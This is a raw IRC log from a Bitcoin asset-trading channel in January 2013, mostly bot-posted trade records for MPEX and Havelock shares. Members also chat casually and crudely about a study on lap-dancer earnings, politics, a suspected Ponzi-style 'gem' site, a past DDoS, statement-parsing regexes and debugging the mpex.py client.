[SDICE] 4 @ 0.7 = 2.8 BTC [+] Jan 26 18:11:00 [HAVELOCK] [SDICE] 6 @ 0.7 = 4.2 BTC [+] Jan 26 18:11:02 [HAVELOCK] [SDICE] 2 @ 0.7 = 1.4 BTC [+] Jan 26 18:11:19 [MPEX] [S.MPOE] 4050 @ 0.00068943 = 2.7922 BTC [+] Jan 26 18:11:34 !ticker h sdice Jan 26 18:11:37 [HAVELOCK:SDICE] 1D: 0.55000001 / 0.60657376 / 0.70000000 (305 shares, 185.00499530 BTC), 7D: 0.44000000 / 0.56411554 / 0.70000000 (1170 shares, 660.01518496 BTC), 30D: 0.37000000 / 0.48434718 / 0.70000000 (4998 shares, 2420.76718484 BTC) Jan 26 18:17:43 [MPEX] [S.DICE] 198 @ 0.00721288 = 1.4282 BTC [-] Jan 26 18:18:49 [MPEX] [S.MPOE] 1200 @ 0.00068725 = 0.8247 BTC [-] Jan 26 18:18:51 [MPEX] [S.MPOE] 4100 @ 0.00068614 = 2.8132 BTC [-] Jan 26 18:18:52 [MPEX] [S.MPOE] 14436 @ 0.00068166 = 9.8404 BTC [-] Jan 26 18:18:54 [MPEX] [S.MPOE] 1614 @ 0.00067517 = 1.0897 BTC [-] Jan 26 18:24:00 [HAVELOCK] [SDICE] 6 @ 0.7 = 4.2 BTC [+] Jan 26 18:29:31 [MPEX] [S.MPOE] 300 @ 0.00067905 = 0.2037 BTC [+] Jan 26 18:32:05 [MPEX] [S.MPOE] 9400 @ 0.00067905 = 6.3831 BTC [+] Jan 26 18:33:01 [HAVELOCK] [SDICE] 10 @ 0.78 = 7.8 BTC [+] Jan 26 18:34:00 [HAVELOCK] [SDICE] 15 @ 0.79 = 11.85 BTC [+] Jan 26 18:37:00 [HAVELOCK] [SDICE] 10 @ 0.79 = 7.9 BTC [+] Jan 26 18:37:02 [HAVELOCK] [SDICE] 4 @ 0.79 = 3.16 BTC [+] Jan 26 18:39:36 I OWN THE MAGNIFICENT GEM Jan 26 18:40:59 [HAVELOCK] [SDICE] 10 @ 0.78 = 7.8 BTC [-] Jan 26 18:41:09 Damn Bugpowder :( Jan 26 18:41:32 I'll bring it back to daddy Jan 26 18:42:37 "Ovulatory cycle effects on tip earnings by lap dancers: economic evidence for human estrus?" Jan 26 18:42:41 this is research now. Jan 26 18:42:50 interviewing hos on public money! Jan 26 18:43:03 I think the gem is going over 100 by monday Jan 26 18:43:06 :) Jan 26 18:43:26 let's say friday Jan 26 18:43:33 nope Jan 26 18:43:37 monday Jan 26 18:43:42 how long has it been out? Jan 26 18:43:47 couples of hours Jan 26 18:43:59 yeah Jan 26 18:44:12 people are going to hit it pretty fast for now Jan 26 18:44:20 assume twice an hour Jan 26 18:44:28 A mixed-model analysis of 296 work shifts (representing about 5300 lap dances) showed an interaction between cycle phase and hormonal contraception use. Normally cycling participants earned about US$335 per 5-h shift during estrus, US$260 per shift during the luteal phase, and US$185 per shift during menstruation. By contrast, participants using contraceptive pills showed no estrous earnings peak. Jan 26 18:44:31 ;;calc 1.1^(24*2) Jan 26 18:44:31 Error: Something in there wasn't a valid number. Jan 26 18:44:53 1.1^48 = 97 BTC Jan 26 18:44:53 Bugpowder it was out yesterday at the very least Jan 26 18:45:06 but the knowledge of it is growing Jan 26 18:45:15 100 BTC by tomorrow night Jan 26 18:45:23 dude Jan 26 18:45:23 seems legit Jan 26 18:45:29 time for a bitbet? Jan 26 18:45:55 meh, they tried to prove that men can detect on a subconcious level the cycle phase of women Jan 26 18:46:09 it's better spent money than welfare Jan 26 18:46:49 it is better spent than welfare Jan 26 18:47:05 and in general men's ability to detect it is a good indiator of mens ability to get laid. Jan 26 18:48:00 [HAVELOCK] [SDICE] 50 @ 0.79 = 39.5 BTC [+] Jan 26 18:48:53 pretty much every kind of research except for political bs like manipulating data to prove an agenda pays off in the long term, knowledge is useful Jan 26 18:50:17 http://www.zdnet.com/anonymous-hacks-us-sentencing-commission-distributes-files-7000010369/ Jan 26 18:50:40 Schadenfreude it being useful is not in discussion tho. it being useful enough to justify the costs is. Jan 26 18:50:59 [HAVELOCK] [SDICE] 31 @ 0.79 = 24.49 BTC [+] Jan 26 18:52:00 [HAVELOCK] [SDICE] 10 @ 0.8 = 8 BTC [+] Jan 26 18:52:50 [MPEX] [S.MPOE] 9094 @ 0.00067905 = 6.1753 BTC [+] Jan 26 18:52:52 [MPEX] [S.MPOE] 1606 @ 0.00068943 = 1.1072 BTC [+] Jan 26 18:52:59 [BTCTC] [B.YABMC] 1 @ 0.0242 BTC [+] Jan 26 18:53:22 [BTCTC] [B.YABMC] 100 @ 0.0241 = 2.41 BTC [-] Jan 26 18:53:24 [BTCTC] [B.YABMC] 86 @ 0.0241 = 2.0726 BTC [-] Jan 26 18:53:35 [BTCTC] [B.YABMC] 100 @ 0.024 = 2.4 BTC [-] Jan 26 18:54:13 [MPEX] [S.MPOE] 17985 @ 0.00068943 = 12.3994 BTC [+] Jan 26 18:55:34 was it tax money or money actually earned by a university with tuition fees etc? Jan 26 18:56:25 does it make a difference ? Jan 26 18:56:46 [MPEX] [S.MPOE] 20450 @ 0.00068943 = 14.0988 BTC [+] Jan 26 18:56:47 there's no actual private university in the us. there's just different types of graft financing. Jan 26 18:58:36 though really, aslong as upto 80% of people's income are being taxed away under various pretenses, where that money goes to isn't that important Jan 26 18:58:51 [MPEX] [S.MPOE] 3117 @ 0.00067517 = 2.1045 BTC [-] Jan 26 18:58:53 [MPEX] [S.MPOE] 19233 @ 0.00067389 = 12.9609 BTC [-] Jan 26 18:59:26 it's like somebody complaining that a mugger gambles the money away he robbed instead of buying food for it Jan 26 18:59:48 exactly what i said. Jan 26 19:01:15 mircea_popescu is a phoney! Jan 26 19:04:05 I'm calling it now and you can count on this : When everything Bitcoin related will go big, Mircea, MPEX and Satoshi Dice won't. Stop worrying , it is a non-issue. Jan 26 19:04:08 hey, good news. Jan 26 19:04:42 yeah, didnt mention bb. Jan 26 19:05:00 it's funny tho, "some greedy people and that's it" Jan 26 19:05:33 this socialist delusion is possibly the most amusing thing i've ever seen Jan 26 19:05:41 "we the people" Jan 26 19:07:42 you mean the us constitution? Jan 26 19:08:27 no, i mean that every single idiot no matter how irrelevant, marginal or outright stupid Jan 26 19:08:38 wields with conviction the almighty weapon of universal agreement with himself. Jan 26 19:08:56 "everyone i know things i'm right, for any values of everyone = 0, which is how many people i know" Jan 26 19:11:49 normal idiots doing this are annoying, politicians voted in by those idiots using the same terminology to push for insane laws, now that's different Jan 26 19:12:41 how obama surrounded himself with children announcing his insane ideas or gun control while his own kids are protected by armed guard 24/7 Jan 26 19:12:46 they're not annoying, it's what they do. a cow chewing cud is not annoying. Jan 26 19:12:55 what are annoying are the people who know better but prefer to "be polite" Jan 26 19:15:09 what do you expect? '68 came, everybody's the same and has a right not to get their feelings hurt Jan 26 19:15:34 hah. fuck that shit. Jan 26 19:16:00 i hurt feelings as if they were fish roe at a japanese restaurant Jan 26 19:18:19 btw, http://www.dailymail.co.uk/news/article-2267062/Lego-accused-racism-Turkish-community-say-toy-offensive-based-mosque.html Jan 26 19:21:04 yeah i saw that yest or w/e Jan 26 19:21:30 [MPEX] [S.MPOE] 13664 @ 0.00068943 = 9.4204 BTC [+] Jan 26 19:21:32 [MPEX] [S.MPOE] 12286 @ 0.00069078 = 8.4869 BTC [+] Jan 26 19:29:02 [MPEX] [S.MPOE] 4441 @ 0.00067389 = 2.9927 BTC [-] Jan 26 19:29:04 [MPEX] [S.MPOE] 18594 @ 0.000673 = 12.5138 BTC [-] Jan 26 19:33:46 [MPEX] [S.MPOE] 3826 @ 0.0006864 = 2.6262 BTC [+] Jan 26 19:33:48 [MPEX] [S.MPOE] 3274 @ 0.00069078 = 2.2616 BTC [+] Jan 26 19:36:20 [MPEX] [S.MPOE] 3650 @ 0.000673 = 2.4565 BTC [-] Jan 26 19:38:37 [MPEX] [S.MPOE] 6356 @ 0.000673 = 4.2776 BTC [-] Jan 26 19:38:39 [MPEX] [S.MPOE] 19750 @ 0.00067292 = 13.2902 BTC [-] Jan 26 19:38:40 [MPEX] [S.MPOE] 1194 @ 0.00067155 = 0.8018 BTC [-] Jan 26 19:45:46 [MPEX] [S.MPOE] 13900 @ 0.00068151 = 9.473 BTC [+] Jan 26 19:47:43 [MPEX] [S.DICE] 950 @ 0.00739837 = 7.0285 BTC [+] Jan 26 19:47:45 [MPEX] [S.DICE] 1190 @ 0.0075 = 8.925 BTC [+] Jan 26 19:48:54 [MPEX] [S.DICE] 50 @ 0.00729868 = 0.3649 BTC [-] Jan 26 19:51:55 [MPEX] [S.MPOE] 6940 @ 0.00069078 = 4.794 BTC [+] Jan 26 19:51:56 [MPEX] [S.MPOE] 2260 @ 0.0006941 = 1.5687 BTC [+] Jan 26 19:54:35 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [-] Jan 26 20:01:00 [HAVELOCK] [SDICE] 3 @ 0.79 = 2.37 BTC [-] Jan 26 20:04:46 [MPEX] [S.MPOE] 15003 @ 0.00068455 = 10.2703 BTC [-] Jan 26 20:04:48 [MPEX] [S.MPOE] 500 @ 0.00068151 = 0.3408 BTC [-] Jan 26 20:11:54 [MPEX] [S.MPOE] 22534 @ 0.00067155 = 15.1327 BTC [-] Jan 26 20:14:42 [MPEX] [S.BBET] 1300 @ 0.001139 = 1.4807 BTC [+] Jan 26 20:15:22 !ticker m s.bbet Jan 26 20:15:24 [MPEX:S.BBET] 1D: 0.0010499 / 0.00113009 / 0.001139 (7000 shares, 7.91 BTC), 7D: 0.00100006 / 0.00104808 / 0.00129998 (29810 shares, 31.24 BTC), 30D: 0.000337 / 0.00078548 / 0.0035 (2276672 shares, 1,788.29 BTC) Jan 26 20:19:00 [MPEX] [S.MPOE] 6950 @ 0.0006761 = 4.6989 BTC [+] Jan 26 20:20:56 [MPEX] [S.MPOE] 41 @ 0.00067155 = 0.0275 BTC [-] Jan 26 20:20:57 [MPEX] [S.MPOE] 17400 @ 0.00067117 = 11.6784 BTC [-] Jan 26 20:20:59 [MPEX] [S.MPOE] 3259 @ 0.00067069 = 2.1858 BTC [-] Jan 26 20:23:08 http://bitbet.us/bet/116/milos-zeman-will-be-the-next-czech-president/ Jan 26 20:23:25 check out that guy, bet 5 cents on zeman came out like 600% Jan 26 20:26:47 [MPEX] [S.MPOE] 10800 @ 0.00067069 = 7.2435 BTC [-] Jan 26 20:28:36 [MPEX] [S.MPOE] 9700 @ 0.00067069 = 6.5057 BTC [-] Jan 26 20:38:32 yes, i bet 0.1 :D Jan 26 20:39:07 visited parents today, watched him being funny together Jan 26 20:40:40 we'll certainly hear more from him... untill they keep him under drugs :D Jan 26 20:40:46 *unless Jan 26 20:54:22 [BTCTC] [B.YABMC] 1 @ 0.0589 BTC [+] Jan 26 20:55:17 lol that bad eh ? Jan 26 20:56:10 yea, watch out Jan 26 20:56:19 wow Jan 26 20:56:23 a YABMC trade Jan 26 20:58:58 [16:53:14] <@assbot> [BTCTC] [B.YABMC] 1 @ 0.0242 BTC [+] Jan 26 20:58:58 [16:53:37] <@assbot> [BTCTC] [B.YABMC] 100 @ 0.0241 = 2.41 BTC [-] Jan 26 20:58:58 [16:53:39] <@assbot> [BTCTC] [B.YABMC] 86 @ 0.0241 = 2.0726 BTC [-] Jan 26 20:58:58 [16:53:51] <@assbot> [BTCTC] [B.YABMC] 100 @ 0.024 = 2.4 BTC [-] Jan 26 20:59:12 appears to happen a lot :-) Jan 26 20:59:31 [MPEX] [S.MPOE] 691 @ 0.00067069 = 0.4634 BTC [-] Jan 26 20:59:33 [MPEX] [S.MPOE] 6183 @ 0.0006705 = 4.1457 BTC [-] Jan 26 20:59:54 markedathome: that is the first one since then Jan 26 21:00:14 someone take mah money! Jan 26 21:03:27 [MPEX] [S.MPOE] 15950 @ 0.0006761 = 10.7838 BTC [+] Jan 26 21:14:44 [MPEX] [S.MPOE] 17900 @ 0.0006705 = 12.002 BTC [-] Jan 26 21:19:07 [MPEX] [S.MPOE] 18300 @ 0.0006705 = 12.2702 BTC [-] Jan 26 21:27:34 [BTCTC] [BASIC-MINING] 10 @ 0.3302 = 3.302 BTC [-] Jan 26 21:27:39 [MPEX] [S.MPOE] 2687 @ 0.0006705 = 1.8016 BTC [-] Jan 26 21:27:42 [MPEX] [S.MPOE] 22750 @ 0.00066999 = 15.2423 BTC [-] Jan 26 21:27:44 [MPEX] [S.MPOE] 17800 @ 0.00066963 = 11.9194 BTC [-] Jan 26 21:27:46 [MPEX] [S.MPOE] 16513 @ 0.00066956 = 11.0564 BTC [-] Jan 26 21:27:52 [BTCTC] [COGNITIVE] 5 @ 0.34 = 1.7 BTC [-] Jan 26 21:28:16 [BTCTC] [COGNITIVE] 5 @ 0.344 = 1.72 BTC [+] Jan 26 21:30:31 [MPEX] [S.MPOE] 18191 @ 0.00066956 = 12.18 BTC [-] Jan 26 21:30:33 [MPEX] [S.MPOE] 8100 @ 0.00066933 = 5.4216 BTC [-] Jan 26 21:30:35 [MPEX] [S.MPOE] 17413 @ 0.00066827 = 11.6366 BTC [-] Jan 26 21:30:35 [MPEX] [S.MPOE] 10412 @ 0.00066811 = 6.9564 BTC [-] Jan 26 21:30:44 [MPEX] [S.MPOE] 3484 @ 0.00066723 = 2.3246 BTC [-] Jan 26 21:32:57 [BTCTC] [B.YABMC] 1 @ 0.0589 BTC [+] Jan 26 21:33:05 [MPEX] [S.MPOE] 21600 @ 0.0006761 = 14.6038 BTC [+] Jan 26 21:39:25 [MPEX] [S.MPOE] 16400 @ 0.00067932 = 11.1408 BTC [+] Jan 26 21:39:59 [MPEX] [S.MPOE] 500 @ 0.00067791 = 0.339 BTC [-] Jan 26 21:42:31 mircea_popescu, buying of february bonds is open till today midnight UTC? Ukto tries hard to confuse me :D Jan 26 21:46:03 [MPEX] [S.DICE] 1150 @ 0.0073451 = 8.4469 BTC [+] Jan 26 21:46:54 48 hours. Jan 26 21:47:25 ends monday 0:00 gtm Jan 26 21:47:44 oh, wasn't it 24 hours? Jan 26 21:47:51 nope Jan 26 21:50:35 okay. now, when we sent 100 BTC and 888 satoshi in 1st jan Jan 26 21:50:51 we should have received 9.99 BTC back, no? Jan 26 21:51:14 as interest Jan 26 21:51:45 o don't tell me i fucked up the interests Jan 26 21:52:05 http://blockchain.info/tx-index/46616158/66fb17ba094184195d5be1356cdcc945e1a74255b2214c74a4f117a5a236f4a8 Jan 26 21:52:08 fed Jan 26 21:52:09 it's only 9.9 Jan 26 21:52:21 bah Jan 26 21:52:27 you round it? Jan 26 21:52:38 mkay, 2nd payment. Jan 26 21:56:31 thanks for pointing out. Jan 26 21:57:12 such a scam :D Jan 26 21:57:18 and now i'm going to go use my new whip Jan 26 21:57:22 catch y'all later. **** BEGIN LOGGING AT Sun Jan 27 04:36:47 2013 Jan 27 04:37:03 [HAVELOCK] [SDICE] 3 @ 0.7777777 = 2.3333 BTC [+] Jan 27 04:37:08 heh Jan 27 04:37:15 !ticker m s.dice Jan 27 04:37:17 [MPEX:S.DICE] 1D: 0.00623493 / 0.00711679 / 0.0075 (208579 shares, 1,484.41 BTC), 7D: 0.00085848 / 0.00498425 / 0.0075 (1128924 shares, 5,626.85 BTC), 30D: 0.00085848 / 0.00423684 / 0.0075 (10455136 shares, 44,296.82 BTC) Jan 27 04:37:58 Did we ever find out who the unlucky sap was that sold 500k S.Dice @ 0.0018? Jan 27 04:38:04 bope Jan 27 04:38:07 nope* Jan 27 04:38:56 I'm sure he has a bitcointalk name. He must be having a rough time right now still.. Jan 27 04:39:04 why are you sure ? Jan 27 04:39:18 .0008 Jan 27 04:39:20 actually Jan 27 04:39:34 O_O even worse Jan 27 04:40:03 i think only like 15k sold that low Jan 27 04:40:07 but there was a 250k at 18 Jan 27 04:40:19 hi mircea Jan 27 04:40:23 o hey e Jan 27 04:40:29 how goes it Jan 27 04:40:31 what happened to site yest ? Jan 27 04:40:40 amateur ddos I think Jan 27 04:40:49 well, how goes... same old, pestering people :D Jan 27 04:40:52 ah. Jan 27 04:41:05 one day soon, I will master regular expressions Jan 27 04:41:16 posix style ? Jan 27 04:41:23 silly fool doesn't realize a ddos against SD doesn't work Jan 27 04:41:36 ya well, earlier this month they ddosed mpex Jan 27 04:41:51 this was pretty high bw, so it finally made move to the proxy system Jan 27 04:42:33 it's funny just how many problems bitcoin resolves. there's not that many internet businesses which can build themselves ddos immunity. Jan 27 04:44:07 eh? Jan 27 04:44:14 if i was doing bank transfers Jan 27 04:44:18 same shit applys Jan 27 04:44:44 kakobrekla well no, blockchain affords erik teh immunitah Jan 27 04:44:55 [MPEX] [S.MPOE] 10845 @ 0.00068459 = 7.4244 BTC [+] Jan 27 04:48:00 [MPEX] [S.DICE] 1301 @ 0.00733653 = 9.5448 BTC [+] Jan 27 04:48:01 [MPEX] [S.DICE] 500 @ 0.0073451 = 3.6726 BTC [+] Jan 27 04:48:03 [MPEX] [S.DICE] 400 @ 0.00741643 = 2.9666 BTC [+] Jan 27 04:48:04 [MPEX] [S.DICE] 599 @ 0.00745 = 4.4626 BTC [+] Jan 27 04:58:46 [MPEX] [S.MPOE] 13295 @ 0.00068459 = 9.1016 BTC [+] Jan 27 04:58:48 [MPEX] [S.MPOE] 12581 @ 0.00068592 = 8.6296 BTC [+] Jan 27 04:59:52 [MPEX] [S.MPOE] 4228 @ 0.00066955 = 2.8309 BTC [-] Jan 27 04:59:54 [MPEX] [S.MPOE] 9057 @ 0.00066476 = 6.0207 BTC [-] Jan 27 04:59:55 [MPEX] [S.MPOE] 12074 @ 0.00066305 = 8.0057 BTC [-] Jan 27 04:59:57 [MPEX] [S.MPOE] 141 @ 0.00066298 = 0.0935 BTC [-] Jan 27 05:03:21 [MPEX] [S.DICE] 2742 @ 0.00745 = 20.4279 BTC [+] Jan 27 05:05:59 I really think the gem is going to hit 1000BTC in a week Jan 27 05:06:15 o was it you with the gem bet ? Jan 27 05:06:15 everything we know about the bitcoin community supports this Jan 27 05:06:24 I got a gem bet refunded Jan 27 05:06:26 btw Jan 27 05:06:37 withdrawl pending! Jan 27 05:06:46 gotta buy the gem Jan 27 05:06:47 can't do that sorta thing, cause site op can just put 1k in and whoop. Jan 27 05:06:53 lol, is it your site ? Jan 27 05:06:55 yeah Jan 27 05:06:58 no Jan 27 05:07:00 not my sit Jan 27 05:07:02 site Jan 27 05:07:12 lol when are you insane ?! Jan 27 05:07:12 has this idea never been done? Jan 27 05:07:22 its like biggest fish Jan 27 05:07:24 it's not even an idea! Jan 27 05:07:25 dead in week or two Jan 27 05:07:32 kakobrekla no it's not. biggest fish allows the poor to play. Jan 27 05:07:35 I mean in bitcoin Jan 27 05:07:44 this one is self limiting, as price goes up the sorts of ppl who'd like to play can't anymore. Jan 27 05:07:48 in bitcoin world has this idea been implemented Jan 27 05:07:57 uhhh Jan 27 05:07:59 Bugpowder not afaik. but i still don't see it's an idea :p Jan 27 05:08:12 there are people betting 4000 btc at a time on s.dice Jan 27 05:08:17 ya dood. Jan 27 05:08:21 do not underestimate the idiocy of bitcoiners Jan 27 05:08:29 nor the greed Jan 27 05:08:47 hey, if i didn't make statements Jan 27 05:08:54 how'd i ever get to look foolish in retrospect ? Jan 27 05:09:37 ;;ident Bugpowder Jan 27 05:09:37 Nick 'Bugpowder', with hostmask 'Bugpowder!47ab6a02@gateway/web/freenode/ip.71.171.106.2', is not identified. Jan 27 05:13:56 http://bitbet.us/bet/2/s-mpoe-will-crash-this-spring/ this is so fucking flattering. Jan 27 05:14:04 200:1 odds ? really ? Jan 27 05:14:31 "One does not simply crash into MPEx" Jan 27 05:14:41 I bet 0.3 Jan 27 05:14:45 for Jan 27 05:14:56 call it a hedge Jan 27 05:15:18 wwell ya, makes sense Jan 27 05:15:29 i think few people just yet realise how to use bbet for hedging Jan 27 05:15:50 like, refund your bfl order, are worried they may ship ? put a yes on that bet, get a little back. Jan 27 05:16:00 not refund it, worry they may not ship ? bet no, etc. Jan 27 05:16:01 regular expression extraction of data is truly an exercise in aligning the precision of what you think you are saying with what you actually are saing Jan 27 05:16:34 yeah it's quite the intellectual sport. Jan 27 05:16:40 Bugpowder: do you need the regex to break down option mpsics? Jan 27 05:16:42 ;) Jan 27 05:16:50 yeah Jan 27 05:17:05 one sec, i'll post the one i use Jan 27 05:17:16 need to parse the orders into cells Jan 27 05:17:23 I have some shit Jan 27 05:17:25 that works Jan 27 05:17:35 but it's probably not as pretty as it should be Jan 27 05:17:38 are you not using a json parser for that? Jan 27 05:17:44 wut? Jan 27 05:17:52 I mean my orders Jan 27 05:17:54 from the stat Jan 27 05:18:00 and my holdings Jan 27 05:18:06 so I know what I can offer Jan 27 05:18:19 .+\.(.)(\d+)(.)$ Jan 27 05:18:22 is there json form my stat? Jan 27 05:18:23 that's what I use Jan 27 05:18:30 STATJSON Jan 27 05:18:34 fuuuuck Jan 27 05:18:45 or look at jurov's mpexagent on github Jan 27 05:18:53 he has the parser for a regular stat Jan 27 05:19:07 lol, rtfm bug Jan 27 05:19:09 smickles uses boobs in regex. Jan 27 05:19:09 rtfm Jan 27 05:19:33 mircea_popescu: you should expect no less of me :D Jan 27 05:19:40 hehehe Jan 27 05:20:00 ther's a 'd' in the middle of the boobs too Jan 27 05:20:08 in retrospect i shoulda made this stuff a lot more complicated Jan 27 05:20:24 having parsers and whatnot by 2013 ? outrageous. Jan 27 05:20:27 [MPEX] [S.BBET] 111 @ 0.001139 = 0.1264 BTC [+] Jan 27 05:21:17 STATJSON fuuuuck rtfm << mwahaha. Jan 27 05:21:48 that precious moment when one realises he's been climbing the wrong hill for the past two days Jan 27 05:22:04 [MPEX] [S.BBET] 500 @ 0.0014 = 0.7 BTC [+] Jan 27 05:22:18 I wouldn't say 2 days Jan 27 05:22:26 maybe 2 hours Jan 27 05:22:42 TWO YEARS! Jan 27 05:22:45 and its totally doable Jan 27 05:23:10 ie openOrders.names = regexp(tmp{1}, '[OSX][A-Z0-9\.]*(?! : B)','match')' Jan 27 05:25:12 remember how someone said something like, 'if i seem great, it's only b/c i have stood on the shoulders of giants' Jan 27 05:25:24 that applies to code too (sometimes) Jan 27 05:25:59 yee Jan 27 05:26:14 actually, most of the time Jan 27 05:31:26 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 27 05:31:32 DAMN THIS GEM Jan 27 05:32:11 so basically Jan 27 05:32:18 the owner keeps the last deposit Jan 27 05:32:21 on the gem? Jan 27 05:33:28 yup Jan 27 05:33:53 he also gets 5% of the way up Jan 27 05:34:22 yeah Jan 27 05:34:24 damn Jan 27 05:34:36 well Jan 27 05:34:45 owner gets to borrow the last deposit Jan 27 05:34:53 i should exclude usefullness factor when i contemplate my next projects Jan 27 05:34:54 till he takes the site down Jan 27 05:35:29 bitcoin gem is a scaaaam Jan 27 05:35:45 ponzee Jan 27 05:35:48 in a way Jan 27 05:35:50 PONZI Jan 27 05:35:54 Charles Ponzi Jan 27 05:36:08 are you impersonating google? Jan 27 05:36:45 the math woks out such that the owner takes 55% of the final deposit in cume fees Jan 27 05:37:05 "For personal reasons, I do not browse the web from my computer. Jan 27 05:37:05 (I also have not net connection much of the time.) To look Jan 27 05:37:05 at page I send mail to a demon which runs wget and mails the Jan 27 05:37:05 page back to me. It is very efficient use of my time, but it Jan 27 05:37:05 is slow in real time." - Richard Stallman Jan 27 05:37:47 funny. Jan 27 05:39:41 sounds like rms Jan 27 05:39:43 o nm, it is rms Jan 27 05:42:30 [MPEX] [S.MPOE] 3719 @ 0.00068592 = 2.5509 BTC [+] Jan 27 05:42:32 [MPEX] [S.MPOE] 5871 @ 0.00068857 = 4.0426 BTC [+] Jan 27 05:43:16 this section of code (which i am refactoring) is like that first stalker (sc2 unit) warped in which somehow lasts through 45 minutes of engagements, only to fall to the last zergling b/f the other guy gg's Jan 27 05:43:51 haha Jan 27 05:47:39 [MPEX] [S.DICE] 1650 @ 0.00735221 = 12.1311 BTC [-] Jan 27 05:52:08 04:37:20 up 467 days, 4:00, load average: 0.00, 0.00, 0.00 Jan 27 05:52:16 i'm calling that router stable Jan 27 05:52:20 idk Jan 27 05:52:27 lol Jan 27 05:52:35 jcpham is a nice guy, puts router behind firewall Jan 27 05:53:05 i'm going tostart using those firewall things one day Jan 27 05:56:39 [MPEX] [S.MPOE] 8410 @ 0.0006859 = 5.7684 BTC [-] Jan 27 06:00:18 smickles: you nerd Jan 27 06:00:20 lol Jan 27 06:00:21 jk Jan 27 06:03:04 [MPEX] [S.MPOE] 22558 @ 0.00067662 = 15.2632 BTC [-] Jan 27 06:03:06 [MPEX] [S.MPOE] 8242 @ 0.00067062 = 5.5273 BTC [-] Jan 27 06:05:55 [MPEX] [S.MPOE] 6090 @ 0.00068132 = 4.1492 BTC [+] Jan 27 06:05:57 [MPEX] [S.MPOE] 457 @ 0.00068857 = 0.3147 BTC [+] Jan 27 06:05:58 [MPEX] [S.MPOE] 2570 @ 0.0006921 = 1.7787 BTC [+] Jan 27 06:12:20 hmm, do I shoot for the balmer peak, or not? Jan 27 06:12:57 i am on a puzzler of a problem to solve Jan 27 06:13:32 what's that ? Jan 27 06:14:52 "Called the Ballmer Peak, it was discovered by Microsoft in the late 80's. The cause is unknown, but somehow a blood alcohol content between 0.129% and 0.138% confers superhuman programming ability" Jan 27 06:15:24 smickles: =) Jan 27 06:16:24 I'm sure it's just confirmation bias, but I believe it's true based on first hand expiremental evidence Jan 27 06:16:35 conman agrees Jan 27 06:24:46 [MPEX] [S.MPOE] 5958 @ 0.00067062 = 3.9956 BTC [-] Jan 27 06:24:48 [MPEX] [S.MPOE] 17842 @ 0.00066577 = 11.8787 BTC [-] Jan 27 06:31:31 lol Jan 27 06:54:11 [MPEX] [S.MPOE] 4200 @ 0.0006921 = 2.9068 BTC [+] Jan 27 06:56:33 SOEBOT refactored and online :) Jan 27 07:00:35 did prev version make a profit ? Jan 27 07:03:51 it would have if you discounted the initial testing of the short calls Jan 27 07:04:27 so all-in-all, a small loss Jan 27 07:04:38 very encouraging, actually Jan 27 07:05:39 plus, with the spot on move of the other one during that rise to 19, I actually came out ahead overall Jan 27 07:06:05 ah so cool Jan 27 07:07:47 oh, and you could add in the mpbor returns Jan 27 07:09:24 yeah, all mpex related thingies were nice this month :) Jan 27 07:12:53 a decent start to the year. Jan 27 07:13:03 i can tell by the feverish pitch forum hate is reaching. Jan 27 07:13:30 [MPEX] [S.MPOE] 4303 @ 0.00068585 = 2.9512 BTC [-] Jan 27 07:13:32 [MPEX] [S.MPOE] 23690 @ 0.00068554 = 16.2404 BTC [-] Jan 27 07:13:35 heh, mpex's volume 'musta burned a few butts Jan 27 07:14:38 average tx, 22 btc. mircea_popescu what sort of average is that? Jan 27 07:15:00 total btc traded / transaction count Jan 27 07:16:37 woah, s.bbet's chart looks like a lognormal distribution Jan 27 07:17:14 smickles totally. im so infatuated with that ipo system... Jan 27 07:17:37 lognormal doesnt end well Jan 27 07:17:40 o ? Jan 27 07:17:59 goes towards 0 no? Jan 27 07:18:01 a a Jan 27 07:18:13 i took it to mean the variance is lognormal Jan 27 07:18:21 as in, ends up at 0 difference from "real price" Jan 27 07:18:28 ah Jan 27 07:18:47 it's an entire topic in finance this, how to best do ipos Jan 27 07:18:55 they're normally a very wasteful endeavour, economically. Jan 27 07:18:59 well, i meant the price chart just happens to look like a lognormal distribution Jan 27 07:19:33 mircea_popescu: what do you see as the goal of an ipo? Jan 27 07:19:48 bring as much money to the company as possible? Jan 27 07:19:50 market price of asset to touch real price of asset as soon as possible. Jan 27 07:20:15 the faster the 0-infinity window is closed the better. Jan 27 07:20:59 so you think the method is supressing the share price? Jan 27 07:21:05 what do you mean ? Jan 27 07:21:37 I mean to get at why you're inf...oh, i read that as infuriated Jan 27 07:21:40 nvm Jan 27 07:22:01 if a company is oversold on ipo that's usually a very bad thing for the company. Jan 27 07:22:11 it's not immediately obvious, but it ruins it more often than not. Jan 27 07:24:33 ;;tslb Jan 27 07:24:35 Time since last block: 31 minutes and 11 seconds Jan 27 07:28:16 ;;calc 16/(.26747373-1) Jan 27 07:28:16 -21.8422200749 Jan 27 07:37:08 smickles hey, any way you could recompile the windows/macosx binaries for pympex ? Jan 27 07:37:14 i think aegis' stuff is out of date. Jan 27 07:37:27 or jurov or who else is in the github there ? Jan 27 07:40:52 mircea_popescu: i've never done that sort of thing, the mac machine i have access too is too old and depreciated, and the windows macine i have access to is annoyingly slow and I don't want to use it. Jan 27 07:41:27 hum Jan 27 07:45:27 hey guys... 1 btc for anyone who can help me with python/mpex.py issue Jan 27 07:46:35 I'm trying mpex.py STAT command, and it's not working Jan 27 07:46:36 what's the issue? Jan 27 07:47:15 help mr. voorhees out smickles Jan 27 07:47:17 I had to change to code to specify the key Jan 27 07:47:26 C:\Python33>/mpex.py ST Jan 27 07:47:28 File "C:\mpex.py", li Jan 27 07:47:29 print '!!!WARNING!! Jan 27 07:47:30 if your default key is not the mpex one Jan 27 07:49:01 that warning means that the data from mpex wasn't signed by mpex Jan 27 07:49:13 do you get it every time? Jan 27 07:49:31 yeah I do now... had to reformat computer so I'm going through process again Jan 27 07:49:59 evoorhees look in mpex.py, does the 10th or so line read Jan 27 07:49:59 self.mpex_url = 'http://mpex.co' Jan 27 07:50:03 ? Jan 27 07:50:33 ;;ident evoorhees Jan 27 07:50:33 Nick 'evoorhees', with hostmask 'evoorhees!~evoorhees@ool-45738bde.dyn.optonline.net', is not identified. Jan 27 07:51:33 yeah it does say that mircea Jan 27 07:52:28 if you are getting a signed response, and that warning happens, something fishy is going on Jan 27 07:53:00 either mpex is signing with the wrong key, or someone else is signing it Jan 27 07:53:14 but, are you actually getting a signed response? Jan 27 07:53:17 hum Jan 27 07:53:23 hmmm lemme try something, one min Jan 27 07:53:31 not sure.. how do I tell? Jan 27 07:53:40 evoorhees you should try going through the thing by 